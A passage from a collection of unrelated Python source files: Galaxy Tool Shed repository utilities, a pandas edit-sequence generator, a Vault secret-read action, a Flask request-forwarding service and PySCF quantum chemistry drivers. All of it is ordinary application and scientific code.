app.install_model.ToolShedRepository.table.c.name == name,
app.install_model.ToolShedRepository.table.c.owner == owner]
if changeset_revision is not None:
clause_list.append(app.install_model.ToolShedRepository.table.c.changeset_revision == changeset_revision)
if installed_changeset_revision is not None:
clause_list.append(app.install_model.ToolShedRepository.table.c.installed_changeset_revision == installed_changeset_revision)
return query.filter(and_(*clause_list)).first()
def get_installed_tool_shed_repository(app, id):
"""Get a tool shed repository record from the Galaxy database defined by the id."""
rval = []
if isinstance(id, list):
return_list = True
else:
id = [id]
return_list = False
repository_ids = [app.security.decode_id(i) for i in id]
rval = [get_installed_repository(app=app, repository_id=repo_id, from_cache=False) for repo_id in repository_ids]
if return_list:
return rval
return rval[0]
def get_prior_import_or_install_required_dict(app, tsr_ids, repo_info_dicts):
"""
This method is used in the Tool Shed when exporting a repository and its dependencies,
and in Galaxy when a repository and its dependencies are being installed. Return a
dictionary whose keys are the received tsr_ids and whose values are a list of tsr_ids,
each of which is contained in the received list of tsr_ids and whose associated repository
must be imported or installed prior to the repository associated with the tsr_id key.
"""
# Initialize the dictionary.
prior_import_or_install_required_dict = {}
for tsr_id in tsr_ids:
prior_import_or_install_required_dict[tsr_id] = []
# Inspect the repository dependencies for each repository about to be installed and populate the dictionary.
for repo_info_dict in repo_info_dicts:
repository, repository_dependencies = get_repository_and_repository_dependencies_from_repo_info_dict(app, repo_info_dict)
if repository:
encoded_repository_id = app.security.encode_id(repository.id)
if encoded_repository_id in tsr_ids:
# We've located the database table record for one of the repositories we're about to install, so find out if it has any repository
# dependencies that require prior installation.
prior_import_or_install_ids = get_repository_ids_requiring_prior_import_or_install(app, tsr_ids, repository_dependencies)
prior_import_or_install_required_dict[encoded_repository_id] = prior_import_or_install_ids
return prior_import_or_install_required_dict
def get_repo_info_tuple_contents(repo_info_tuple):
"""Take care in handling the repo_info_tuple as it evolves over time as new tool shed features are introduced."""
if len(repo_info_tuple) == 6:
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, tool_dependencies = repo_info_tuple
repository_dependencies = None
elif len(repo_info_tuple) == 7:
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies = repo_info_tuple
return description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies
def get_repository_admin_role_name(repository_name, repository_owner):
return f'{str(repository_name)}_{str(repository_owner)}_admin'
def get_repository_and_repository_dependencies_from_repo_info_dict(app, repo_info_dict):
"""Return a tool_shed_repository or repository record defined by the information in the received repo_info_dict."""
repository_name = list(repo_info_dict.keys())[0]
repo_info_tuple = repo_info_dict[repository_name]
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies = \
get_repo_info_tuple_contents(repo_info_tuple)
if hasattr(app, "install_model"):
# In a tool shed client (Galaxy, or something install repositories like Galaxy)
tool_shed = get_tool_shed_from_clone_url(repository_clone_url)
repository = get_repository_for_dependency_relationship(app, tool_shed, repository_name, repository_owner, changeset_revision)
else:
# We're in the tool shed.
repository = get_repository_by_name_and_owner(app, repository_name, repository_owner)
return repository, repository_dependencies
def get_repository_by_id(app, id):
"""Get a repository from the database via id."""
if is_tool_shed_client(app):
return app.install_model.context.query(app.install_model.ToolShedRepository).get(app.security.decode_id(id))
else:
sa_session = app.model.session
return sa_session.query(app.model.Repository).get(app.security.decode_id(id))
def get_repository_by_name_and_owner(app, name, owner, eagerload_columns=None):
"""Get a repository from the database via name and owner"""
repository_query = get_repository_query(app)
if is_tool_shed_client(app):
return repository_query \
.filter(and_(app.install_model.ToolShedRepository.table.c.name == name,
app.install_model.ToolShedRepository.table.c.owner == owner)) \
.first()
# We're in the tool shed.
q = repository_query.filter(
and_(
app.model.Repository.table.c.name == name,
app.model.User.table.c.username == owner,
app.model.Repository.table.c.user_id == app.model.User.table.c.id
)
)
if eagerload_columns:
q = q.options(joinedload(*eagerload_columns))
return q.first()
def get_repository_by_name(app, name):
"""Get a repository from the database via name."""
return get_repository_query(app).filter_by(name=name).first()
def get_repository_dependency_types(repository_dependencies):
"""
Inspect the received list of repository_dependencies tuples and return boolean values
for has_repository_dependencies and has_repository_dependencies_only_if_compiling_contained_td.
"""
# Set has_repository_dependencies, which will be True only if at least one repository_dependency
# is defined with the value of
# only_if_compiling_contained_td as False.
has_repository_dependencies = False
for rd_tup in repository_dependencies:
tool_shed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td = \
common_util.parse_repository_dependency_tuple(rd_tup)
if not util.asbool(only_if_compiling_contained_td):
has_repository_dependencies = True
break
# Set has_repository_dependencies_only_if_compiling_contained_td, which will be True only if at
# least one repository_dependency is defined with the value of only_if_compiling_contained_td as True.
has_repository_dependencies_only_if_compiling_contained_td = False
for rd_tup in repository_dependencies:
tool_shed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td = \
common_util.parse_repository_dependency_tuple(rd_tup)
if util.asbool(only_if_compiling_contained_td):
has_repository_dependencies_only_if_compiling_contained_td = True
break
return has_repository_dependencies, has_repository_dependencies_only_if_compiling_contained_td
def get_repository_for_dependency_relationship(app, tool_shed, name, owner, changeset_revision):
"""
Return an installed tool_shed_repository database record that is defined by either the current changeset
revision or the installed_changeset_revision.
"""
# This method is used only in Galaxy, not the Tool Shed. We store the port (if one exists) in the database.
tool_shed = common_util.remove_protocol_from_tool_shed_url(tool_shed)
if tool_shed is None or name is None or owner is None or changeset_revision is None:
message = "Unable to retrieve the repository record from the database because one or more of the following "
message += "required parameters is None: tool_shed: %s, name: %s, owner: %s, changeset_revision: %s " % \
(str(tool_shed), str(name), str(owner), str(changeset_revision))
raise Exception(message)
repository = get_installed_repository(app=app,
tool_shed=tool_shed,
name=name,
owner=owner,
installed_changeset_revision=changeset_revision)
if not repository:
repository = get_installed_repository(app=app,
tool_shed=tool_shed,
name=name,
owner=owner,
changeset_revision=changeset_revision)
if not repository:
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, tool_shed)
repository_clone_url = os.path.join(tool_shed_url, 'repos', owner, name)
repo_info_tuple = (None, repository_clone_url, changeset_revision, None, owner, None, None)
repository, pcr = repository_was_previously_installed(app, tool_shed_url, name, repo_info_tuple)
if not repository:
# The received changeset_revision is no longer installable, so get the next changeset_revision
# in the repository's changelog in the tool shed that is associated with repository_metadata.
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, tool_shed)
params = dict(name=name, owner=owner, changeset_revision=changeset_revision)
pathspec = ['repository', 'next_installable_changeset_revision']
text = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
if text:
repository = get_installed_repository(app=app,
tool_shed=tool_shed,
name=name,
owner=owner,
changeset_revision=text)
return repository
def get_repository_ids_requiring_prior_import_or_install(app, tsr_ids, repository_dependencies):
"""
This method is used in the Tool Shed when exporting a repository and its dependencies,
and in Galaxy when a repository and its dependencies are being installed. Inspect the
received repository_dependencies and determine if the encoded id of each required
repository is in the received tsr_ids. If so, then determine whether that required
repository should be imported / installed prior to its dependent repository. Return a
list of encoded repository ids, each of which is contained in the received list of tsr_ids,
and whose associated repositories must be imported / installed prior to the dependent
repository associated with the received repository_dependencies.
"""
prior_tsr_ids = []
if repository_dependencies:
for key, rd_tups in repository_dependencies.items():
if key in ['description', 'root_key']:
continue
for rd_tup in rd_tups:
tool_shed, \
name, \
owner, \
changeset_revision, \
prior_installation_required, \
only_if_compiling_contained_td = \
common_util.parse_repository_dependency_tuple(rd_tup)
# If only_if_compiling_contained_td is False, then the repository dependency
# is not required to be installed prior to the dependent repository even if
# prior_installation_required is True. This is because the only meaningful
# content of the repository dependency is its contained tool dependency, which
# is required in order to compile the dependent repository's tool dependency.
# In the scenario where the repository dependency is not installed prior to the
# dependent repository's tool dependency compilation process, the tool dependency
# compilation framework will install the repository dependency prior to compilation
# of the dependent repository's tool dependency.
if not util.asbool(only_if_compiling_contained_td):
if util.asbool(prior_installation_required):
if is_tool_shed_client(app):
# We store the port, if one exists, in the database.
tool_shed = common_util.remove_protocol_from_tool_shed_url(tool_shed)
repository = get_repository_for_dependency_relationship(app,
tool_shed,
name,
owner,
changeset_revision)
else:
repository = get_repository_by_name_and_owner(app, name, owner)
if repository:
encoded_repository_id = app.security.encode_id(repository.id)
if encoded_repository_id in tsr_ids:
prior_tsr_ids.append(encoded_repository_id)
return prior_tsr_ids
def get_repository_in_tool_shed(app, id, eagerload_columns=None):
"""Get a repository on the tool shed side from the database via id."""
q = get_repository_query(app)
if eagerload_columns:
q = q.options(joinedload(*eagerload_columns))
return q.get(app.security.decode_id(id))
def get_repository_owner(cleaned_repository_url):
"""Gvien a "cleaned" repository clone URL, return the owner of the repository."""
items = cleaned_repository_url.split('/repos/')
repo_path = items[1]
if repo_path.startswith('/'):
repo_path = repo_path.replace('/', '', 1)
return repo_path.lstrip('/').split('/')[0]
def get_repository_owner_from_clone_url(repository_clone_url):
"""Given a repository clone URL, return the owner of the repository."""
tmp_url = common_util.remove_protocol_and_user_from_clone_url(repository_clone_url)
return get_repository_owner(tmp_url)
def get_repository_query(app):
if is_tool_shed_client(app):
query = app.install_model.context.query(app.install_model.ToolShedRepository)
else:
query = app.model.context.query(app.model.Repository)
return query
def get_role_by_id(app, role_id):
"""Get a Role from the database by id."""
sa_session = app.model.session
return sa_session.query(app.model.Role).get(app.security.decode_id(role_id))
def get_tool_shed_from_clone_url(repository_clone_url):
tmp_url = common_util.remove_protocol_and_user_from_clone_url(repository_clone_url)
return tmp_url.split('/repos/')[0].rstrip('/')
def get_tool_shed_repository_by_id(app, repository_id):
"""Return a tool shed repository database record defined by the id."""
# This method is used only in Galaxy, not the tool shed.
return app.install_model.context.query(app.install_model.ToolShedRepository) \
.filter(app.install_model.ToolShedRepository.table.c.id == app.security.decode_id(repository_id)) \
.first()
def get_tool_shed_status_for_installed_repository(app, repository):
"""
Send a request to the tool shed to retrieve information about newer installable repository revisions,
current revision updates, whether the repository revision is the latest downloadable revision, and
whether the repository has been deprecated in the tool shed. The received repository is a ToolShedRepository
object from Galaxy.
"""
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, str(repository.tool_shed))
params = dict(name=repository.name, owner=repository.owner, changeset_revision=repository.changeset_revision)
pathspec = ['repository', 'status_for_installed_repository']
try:
encoded_tool_shed_status_dict = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
tool_shed_status_dict = encoding_util.tool_shed_decode(encoded_tool_shed_status_dict)
return tool_shed_status_dict
except HTTPError as e:
# This should handle backward compatility to the Galaxy 12/20/12 release. We used to only handle updates for an installed revision
# using a boolean value.
log.debug("Error attempting to get tool shed status for installed repository %s: %s\nAttempting older 'check_for_updates' method.\n" %
(str(repository.name), str(e)))
pathspec = ['repository', 'check_for_updates']
params['from_update_manager'] = True
try:
# The value of text will be 'true' or 'false', depending upon whether there is an update available for the installed revision.
text = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
return dict(revision_update=text)
except Exception:
# The required tool shed may be unavailable, so default the revision_update value to 'false'.
return dict(revision_update='false')
except Exception:
log.exception("Error attempting to get tool shed status for installed repository %s", str(repository.name))
return {}
def is_tool_shed_client(app):
"""
The tool shed and clients to the tool (i.e. Galaxy) require a lot
of similar functionality in this file but with small differences. This
method should determine if the app performing the action is the tool shed
or a client of the tool shed.
"""
return hasattr(app, "install_model")
def repository_was_previously_installed(app, tool_shed_url, repository_name, repo_info_tuple, from_tip=False):
"""
Find out if a repository is already installed into Galaxy - there are several scenarios where this
is necessary. For example, this method will handle the case where the repository was previously
installed using an older changeset_revsion, but later the repository was updated in the tool shed
and now we're trying to install the latest changeset revision of the same repository instead of
updating the one that was previously installed. We'll look in the database instead of on disk since
the repository may be currently uninstalled.
"""
tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry(app, tool_shed_url)
description, repository_clone_url, changeset_revision, ctx_rev, repository_owner, repository_dependencies, tool_dependencies = \
get_repo_info_tuple_contents(repo_info_tuple)
tool_shed = get_tool_shed_from_clone_url(repository_clone_url)
# See if we can locate the repository using the value of changeset_revision.
tool_shed_repository = get_installed_repository(app,
tool_shed=tool_shed,
name=repository_name,
owner=repository_owner,
installed_changeset_revision=changeset_revision)
if tool_shed_repository:
return tool_shed_repository, changeset_revision
# Get all previous changeset revisions from the tool shed for the repository back to, but excluding,
# the previous valid changeset revision to see if it was previously installed using one of them.
params = dict(galaxy_url=web.url_for('/', qualified=True),
name=repository_name,
owner=repository_owner,
changeset_revision=changeset_revision,
from_tip=str(from_tip))
pathspec = ['repository', 'previous_changeset_revisions']
text = util.url_get(tool_shed_url, auth=app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
if text:
changeset_revisions = util.listify(text)
for previous_changeset_revision in changeset_revisions:
tool_shed_repository = get_installed_repository(app,
tool_shed=tool_shed,
name=repository_name,
owner=repository_owner,
installed_changeset_revision=previous_changeset_revision)
if tool_shed_repository:
return tool_shed_repository, previous_changeset_revision
return None, None
def set_repository_attributes(app, repository, status, error_message, deleted, uninstalled, remove_from_disk=False):
if remove_from_disk:
relative_install_dir = repository.repo_path(app)
if relative_install_dir:
clone_dir = os.path.abspath(relative_install_dir)
try:
shutil.rmtree(clone_dir)
log.debug("Removed repository installation directory: %s", clone_dir)
except Exception as e:
log.debug("Error removing repository installation directory %s: %s", clone_dir, util.unicodify(e))
repository.error_message = error_message
repository.status = status
repository.deleted = deleted
repository.uninstalled = uninstalled
app.install_model.context.add(repository)
app.install_model.context.flush()
__all__ = (
'check_for_updates',
'check_or_update_tool_shed_status_for_installed_repository',
'create_or_update_tool_shed_repository',
'extract_components_from_tuple',
'generate_tool_shed_repository_install_dir',
'get_absolute_path_to_file_in_repository',
'get_ids_of_tool_shed_repositories_being_installed',
'get_installed_repository',
'get_installed_tool_shed_repository',
'get_prior_import_or_install_required_dict',
'get_repo_info_tuple_contents',
'get_repository_admin_role_name',
'get_repository_and_repository_dependencies_from_repo_info_dict',
'get_repository_by_id',
'get_repository_by_name',
'get_repository_by_name_and_owner',
'get_repository_dependency_types',
'get_repository_for_dependency_relationship',
'get_repository_ids_requiring_prior_import_or_install',
'get_repository_in_tool_shed',
'get_repository_owner',
'get_repository_owner_from_clone_url',
'get_repository_query',
'get_role_by_id',
'get_tool_shed_from_clone_url',
'get_tool_shed_repository_by_id',
'get_tool_shed_status_for_installed_repository',
'is_tool_shed_client',
'repository_was_previously_installed',
'set_repository_attributes',
)
|
import pandas as pd
from itertools import groupby
from operator import itemgetter
class SequenceGenerator:
def __init__(self, csvfile, jsThreshold):
self.datafile = csvfile
self.jsThreshold = jsThreshold
"""
Convert the input csv file into dataframe
"""
def _csv2df(self):
return pd.read_csv(self.datafile, dtype={'item_id':int, 'user_id':str})
"""
Generate database by selecting the non-null sequences satisfying the js-distance threshold
"""
def generate_db(self):
db = self._csv2df()[['item_id', 'user_id', 'edit_type', 'rev_timestamp', 'js_distance']].sort_values(by=['item_id','rev_timestamp'])
filter = db.loc[db['js_distance'] >= self.jsThreshold][['item_id', 'user_id', 'edit_type']]
return filter[filter.user_id.notnull()]
def generate_dev_db(self, dev):
db = self._csv2df()[['item_id', 'user_id', 'edit_type', 'rev_timestamp', 'prediction', 'js_distance']].sort_values(by=['item_id', 'rev_timestamp'])
filter = db.loc[(db['js_distance']>=self.jsThreshold) & (db['prediction']==dev)][['item_id', 'user_id', 'edit_type']]
return filter[filter.user_id.notnull()]
"""
Generate the sequence database by integrating all edits conducted upon one article in a list, where
the serial edits from the same editor are collapsed into one sub-list
Args:
csv file of scheme: article_id : int
editor_id : int
edit_type : string
Return:
A list of list [[a], [b]], where a and b are collapsed edit types
"""
def generate_sequence(self):
db = self.generate_db()
df = db.groupby(['item_id', 'user_id']).agg({'edit_type': list})
result = df.groupby(['item_id']).agg({'edit_type': list})
tmp = []
for ls in result.values.tolist():
tmp.append(ls[0])
return tmp
def generate_dev_sequence(self, dev):
db = self.generate_dev_db(dev=dev)
df = db.groupby(['item_id', 'user_id']).agg({'edit_type': list})
return df.values.tolist()
|
from lib import action
class VaultReadAction(action.VaultBaseAction):
def run(self, path, kv_version, mount_point, version):
value = None
if kv_version == 1:
value = self.vault.kv.v1.read_secret(path=path, mount_point=mount_point)
elif kv_version == 2:
value = self.vault.kv.v2.read_secret_version(path=path, mount_point=mount_point,
version=version)
if value:
return value['data']
else:
raise KeyError("Key was not found in Vault")
|
#!/home/zhuqingjie/env/py3_tf_low/bin/python
'''
@Time : 07.26 0026 下午 01:19
@Author : zhuqingjie
@User : zhu
@FileName: control.py
@Software: PyCharm
'''
'''
总的控制逻辑
1,control只向外部暴露一个端口,外部向control发请求,control根据mode来去调用其他server模块
2,同时还解决了外部不能直接访问ai节点的问题。主服务跑在ai节点,control服务跑在登陆节点,这样外部就能访问了
'''
import json, os, requests, sys, time
from flask import Flask, request
# param
ai01_ip = '10.11.1.81'
ai02_ip = '10.11.1.82'
ai03_ip = '10.11.1.83'
ai04_ip = '10.11.1.84'
ai05_ip = '10.11.1.85'
IP = ai05_ip # 主服务的IP地址
app = Flask(__name__)
print_ = lambda x: print(f"--> [{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}]: {x}")
printc = lambda s: print(f"\033[1;35m{s}\033[0m")
mode_list = ['1', '2', '21', '22', '3', '4', '5', '51', '6']
def do_request(port, body):
url = f'http://{IP}:{port}'
printc(url)
printc(body)
response = requests.post(url, data=body)
printc('do_request ok')
return response.text
@app.route('/', methods=['POST'])
def handle():
print('\n')
print('-' * 50)
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
# 读取参数
dic_url = request.form
print_(f'\n\tparams: {dic_url}')
error_param = 'error_param'
mode = dic_url.get('mode', error_param)
if mode == error_param:
return json.dumps({
'status': -1,
'info': 'param error: not find "mode"!',
'dst_path': 'null',
})
elif mode not in mode_list:
return json.dumps({
'status': -1,
'info': 'param error: "mode" must in 1-6!',
'dst_path': 'null',
})
elif mode == '1':
return do_request(9001, dic_url)
elif mode == '2':
return do_request(9002, dic_url)
elif mode == '21':
return do_request(9021, dic_url)
elif mode == '22':
return do_request(9022, dic_url)
elif mode == '3':
return do_request(9003, dic_url)
elif mode == '4':
return do_request(9004, dic_url)
elif mode == '5':
return do_request(9005, dic_url)
elif mode == '51':
return do_request(9051, dic_url)
elif mode == '6':
return do_request(9006, dic_url)
# elif mode in ['10', '11']:
# return do_request(9010, dic_url)
else:
return json.dumps({
'status': 2,
'info': 'error: An impossible error.',
'dst_path': 'null',
})
if __name__ == '__main__':
# app.run(host='0.0.0.0', port='7006')
body = {
'mode': '1',
'donotsave': '0',
'userID': 'zhuqingj',
'src_path': '/home/zhangli_lab/zhuqingjie/prj/tunet/res_test/0x.bmp',
}
res = do_request(9001, body)
print(res)
|
#coverage:ignore
""" Drivers for various PySCF electronic structure routines """
from typing import Tuple, Optional
import sys
import h5py
import numpy as np
from pyscf import gto, scf, ao2mo, mcscf, lo, tools, cc
from pyscf.mcscf import avas
def stability(pyscf_mf):
"""
Test wave function stability and re-optimize SCF.
Args:
pyscf_mf: PySCF mean field object (e.g. `scf.RHF()`)
Returns:
pyscf_mf: Updated PySCF mean field object
"""
new_orbitals = pyscf_mf.stability()[0]
new_1rdm = pyscf_mf.make_rdm1(new_orbitals, pyscf_mf.mo_occ)
pyscf_mf = pyscf_mf.run(new_1rdm)
return pyscf_mf
def localize(pyscf_mf, loc_type='pm', verbose=0):
""" Localize orbitals given a PySCF mean-field object
Args:
pyscf_mf: PySCF mean field object
loc_type (str): localization type;
Pipek-Mezey ('pm') or Edmiston-Rudenberg ('er')
verbose (int): print level during localization
Returns:
pyscf_mf: Updated PySCF mean field object with localized orbitals
"""
# Note: After loading with `load_casfile_to_pyscf()` you can quiet message
# by resetting mf.mol, i.e., mf.mol = gto.M(...)
# but this assumes you have the *exact* molecular specification on hand.
# I've gotten acceptable results by restoring mf.mol this way (usually
# followed by calling mf.kernel()). But consistent localization is not a
# given (not unique) despite restoring data this way, hence the message.
if len(pyscf_mf.mol.atom) == 0:
sys.exit("`localize()` requires atom loc. and atomic basis to be" + \
" defined.\n " + \
"It also can be sensitive to the initial guess and MO" + \
" coefficients.\n " + \
"Best to try re-creating the PySCF molecule and doing the" + \
" SCF, rather than\n " + \
"try to load the mean-field object with" + \
" `load_casfile_to_pyscf()`. You can \n " + \
"try to provide the missing information, but consistency" + \
" cannot be guaranteed!")
# Split-localize (localize DOCC, SOCC, and virtual separately)
docc_idx = np.where(np.isclose(pyscf_mf.mo_occ, 2.))[0]
socc_idx = np.where(np.isclose(pyscf_mf.mo_occ, 1.))[0]
virt_idx = np.where(np.isclose(pyscf_mf.mo_occ, 0.))[0]
# Pipek-Mezey
if loc_type.lower() == 'pm':
print("Localizing doubly occupied ... ", end="")
loc_docc_mo = lo.PM(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, docc_idx]).kernel(verbose=verbose)
print("singly occupied ... ", end="")
loc_socc_mo = lo.PM(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, socc_idx]).kernel(verbose=verbose)
print("virtual ... ", end="")
loc_virt_mo = lo.PM(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, virt_idx]).kernel(verbose=verbose)
print("DONE")
# Edmiston-Rudenberg
elif loc_type.lower() == 'er':
print("Localizing doubly occupied ... ", end="")
loc_docc_mo = lo.ER(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, docc_idx]).kernel(verbose=verbose)
print("singly occupied ... ", end="")
loc_socc_mo = lo.ER(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, socc_idx]).kernel(verbose=verbose)
print("virtual ... ", end="")
loc_virt_mo = lo.ER(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, virt_idx]).kernel(verbose=verbose)
print("DONE")
# overwrite orbitals with localized orbitals
pyscf_mf.mo_coeff[:, docc_idx] = loc_docc_mo.copy()
pyscf_mf.mo_coeff[:, socc_idx] = loc_socc_mo.copy()
pyscf_mf.mo_coeff[:, virt_idx] = loc_virt_mo.copy()
return pyscf_mf
def avas_active_space(pyscf_mf,
ao_list=None,
molden_fname='avas_localized_orbitals',
**kwargs):
""" Return AVAS active space as PySCF molecule and mean-field object
Args:
pyscf_mf: PySCF mean field object
Kwargs:
ao_list: list of strings of AOs (print mol.ao_labels() to see options)
Example: ao_list = ['H 1s', 'O 2p', 'O 2s'] for water
verbose (bool): do additional print
molden_fname (str): MOLDEN filename to save AVAS active space orbitals.
Default is to save
to 'avas_localized_orbitals.molden'
**kwargs: other keyworded arguments to pass into avas.avas()
Returns:
pyscf_active_space_mol: Updated PySCF molecule object from
AVAS-selected active space
pyscf_active_space_mf: Updated PySCF mean field object from
AVAS-selected active space
"""
# Note: requires openshell_option = 3 for this to work, which keeps all
# singly occupied in CAS
# we also require canonicalize = False so that we don't destroy local orbs
avas_output = avas.avas(pyscf_mf,
ao_list,
canonicalize=False,
openshell_option=3,
**kwargs)
active_norb, active_ne, reordered_orbitals = avas_output
active_alpha, _ = get_num_active_alpha_beta(pyscf_mf, active_ne)
if molden_fname is not None:
# save set of localized orbitals for active space
if isinstance(pyscf_mf, scf.rohf.ROHF):
frozen_alpha = pyscf_mf.nelec[0] - active_alpha
assert frozen_alpha >= 0
else:
frozen_alpha = pyscf_mf.mol.nelectron // 2 - active_alpha
assert frozen_alpha >= 0
active_space_idx = slice(frozen_alpha, frozen_alpha + active_norb)
active_mos = reordered_orbitals[:, active_space_idx]
tools.molden.from_mo(pyscf_mf.mol,
molden_fname + '.molden',
mo_coeff=active_mos)
# Choosing an active space changes the molecule ("freezing" electrons,
# for example), so we
# form the active space tensors first, then re-form the PySCF objects to
# ensure consistency
pyscf_active_space_mol, pyscf_active_space_mf = cas_to_pyscf(
*pyscf_to_cas(pyscf_mf,
cas_orbitals=active_norb,
cas_electrons=active_ne,
avas_orbs=reordered_orbitals))
return pyscf_active_space_mol, pyscf_active_space_mf
def cas_to_pyscf(h1, eri, ecore, num_alpha, num_beta):
""" Return a PySCF molecule and mean-field object from pre-computed CAS Ham
Args:
h1 (ndarray) - 2D matrix containing one-body terms (MO basis)
eri (ndarray) - 4D tensor containing two-body terms (MO basis)
ecore (float) - frozen core electronic energy + nuclear repulsion energy
num_alpha (int) - number of spin up electrons in CAS space
num_beta (int) - number of spin down electrons in CAS space
Returns:
pyscf_mol: PySCF molecule object
pyscf_mf: PySCF mean field object
"""
n_orb = len(h1) # number orbitals
assert [n_orb] * 4 == [*eri.shape] # check dims are consistent
pyscf_mol = gto.M()
pyscf_mol.nelectron = num_alpha + num_beta
n_orb = h1.shape[0]
alpha_diag = [1] * num_alpha + [0] * (n_orb - num_alpha)
beta_diag = [1] * num_beta + [0] * (n_orb - num_beta)
# Assumes Hamiltonian is either RHF or ROHF ... should be OK since UHF will
# have two h1s, etc.
if num_alpha == num_beta:
pyscf_mf = scf.RHF(pyscf_mol)
scf_energy = ecore + \
2*np.einsum('ii', h1[:num_alpha,:num_alpha]) + \
2*np.einsum('iijj',
eri[:num_alpha,:num_alpha,:num_alpha,:num_alpha]) - \
np.einsum('ijji',
eri[:num_alpha,:num_alpha,:num_alpha,:num_alpha])
else:
pyscf_mf = scf.ROHF(pyscf_mol)
pyscf_mf.nelec = (num_alpha, num_beta)
# grab singly and doubly occupied orbitals (assume high-spin open shell)
docc = slice(None, min(num_alpha, num_beta))
socc = slice(min(num_alpha, num_beta), max(num_alpha, num_beta))
scf_energy = ecore + \
2.0*np.einsum('ii',h1[docc, docc]) + \
np.einsum('ii',h1[socc, socc]) + \
2.0*np.einsum('iijj',eri[docc, docc, docc, docc]) - \
np.einsum('ijji',eri[docc, docc, docc, docc]) + \
np.einsum('iijj',eri[socc, socc, docc, docc]) - \
0.5*np.einsum('ijji',eri[socc, docc, docc, socc]) + \
np.einsum('iijj',eri[docc, docc, socc, socc]) - \
0.5*np.einsum('ijji',eri[docc, socc, socc, docc]) + \
0.5*np.einsum('iijj',eri[socc, socc, socc, socc]) - \
0.5*np.einsum('ijji',eri[socc, socc, socc, socc])
pyscf_mf.get_hcore = lambda *args: np.asarray(h1)
pyscf_mf.get_ovlp = lambda *args: np.eye(h1.shape[0])
pyscf_mf.energy_nuc = lambda *args: ecore
pyscf_mf._eri = eri # ao2mo.restore('8', np.zeros((8, 8, 8, 8)), 8)
pyscf_mf.e_tot = scf_energy
pyscf_mf.init_guess = '1e'
pyscf_mf.mo_coeff = np.eye(n_orb)
pyscf_mf.mo_occ = np.array(alpha_diag) + np.array(beta_diag)
pyscf_mf.mo_energy, _ = np.linalg.eigh(pyscf_mf.get_fock())
return pyscf_mol, pyscf_mf
def pyscf_to_cas(pyscf_mf,
cas_orbitals: Optional[int] = None,
cas_electrons: Optional[int] = None,
avas_orbs=None):
""" Return CAS Hamiltonian tensors from a PySCF mean-field object
Args:
pyscf_mf: PySCF mean field object
cas_orbitals (int, optional): number of orbitals in CAS space,
default all orbitals
cas_electrons (int, optional): number of electrons in CAS space,
default all electrons
avas_orbs (ndarray, optional): orbitals selected by AVAS in PySCF
Returns:
h1 (ndarray) - 2D matrix containing one-body terms (MO basis)
eri (ndarray) - 4D tensor containing two-body terms (MO basis)
ecore (float) - frozen core electronic energy + nuclear repulsion energy
num_alpha (int) - number of spin up electrons in CAS space
num_beta (int) - number of spin down electrons in CAS space
"""
# Only RHF or ROHF possible with mcscf.CASCI
assert isinstance(pyscf_mf, scf.rhf.RHF) # ROHF is child of RHF class
if cas_orbitals is None:
cas_orbitals = len(pyscf_mf.mo_coeff)
if cas_electrons is None:
cas_electrons = pyscf_mf.mol.nelectron
cas = mcscf.CASCI(pyscf_mf, ncas=cas_orbitals, nelecas=cas_electrons)
h1, ecore = cas.get_h1eff(mo_coeff=avas_orbs)
eri = cas.get_h2cas(mo_coeff=avas_orbs)
eri = ao2mo.restore('s1', eri, h1.shape[0]) # chemist convention (11|22)
ecore = float(ecore)
num_alpha, num_beta = get_num_active_alpha_beta(pyscf_mf, cas_electrons)
return h1, eri, ecore, num_alpha, num_beta
def get_num_active_alpha_beta(pyscf_mf, cas_electrons):
""" Return number of alpha and beta electrons in the active space given
number of CAS electrons
This assumes that all the unpaired electrons are in the active space
Args:
pyscf_mf: PySCF mean field object
cas_orbitals (int): number of electrons in CAS space,
Returns:
num_alpha (int): number of alpha (spin-up) electrons in active space
num_beta (int): number of beta (spin-down) electrons in active space
"""
# Sanity checks and active space info
total_electrons = pyscf_mf.mol.nelectron
frozen_electrons = total_electrons - cas_electrons
assert frozen_electrons % 2 == 0
# ROHF == RHF but RHF != ROHF, and we only do either RHF or ROHF
if isinstance(pyscf_mf, scf.rohf.ROHF):
frozen_alpha = frozen_electrons // 2
frozen_beta = frozen_electrons // 2
num_alpha = pyscf_mf.nelec[0] - frozen_alpha
num_beta = pyscf_mf.nelec[1] - frozen_beta
assert np.isclose(num_beta + num_alpha, cas_electrons)
else:
assert cas_electrons % 2 == 0
num_alpha = cas_electrons // 2
num_beta = cas_electrons // 2
return num_alpha, num_beta
def load_casfile_to_pyscf(fname,
num_alpha: Optional[int] = None,
num_beta: Optional[int] = None):
""" Load CAS Hamiltonian from pre-computed HD5 file into a PySCF molecule
and mean-field object
Args:
fname (str): path to hd5 file to be created containing CAS one and two
body terms
num_alpha (int, optional): number of spin up electrons in CAS space
num_beta (int, optional): number of spin down electrons in CAS space
Returns:
pyscf_mol: PySCF molecule object
pyscf_mf: PySCF mean field object
"""
with h5py.File(fname, "r") as f:
eri = np.asarray(f['eri'][()])
# h1 one body elements are sometimes called different things. Try a few.
try:
h1 = np.asarray(f['h0'][()])
except KeyError:
try:
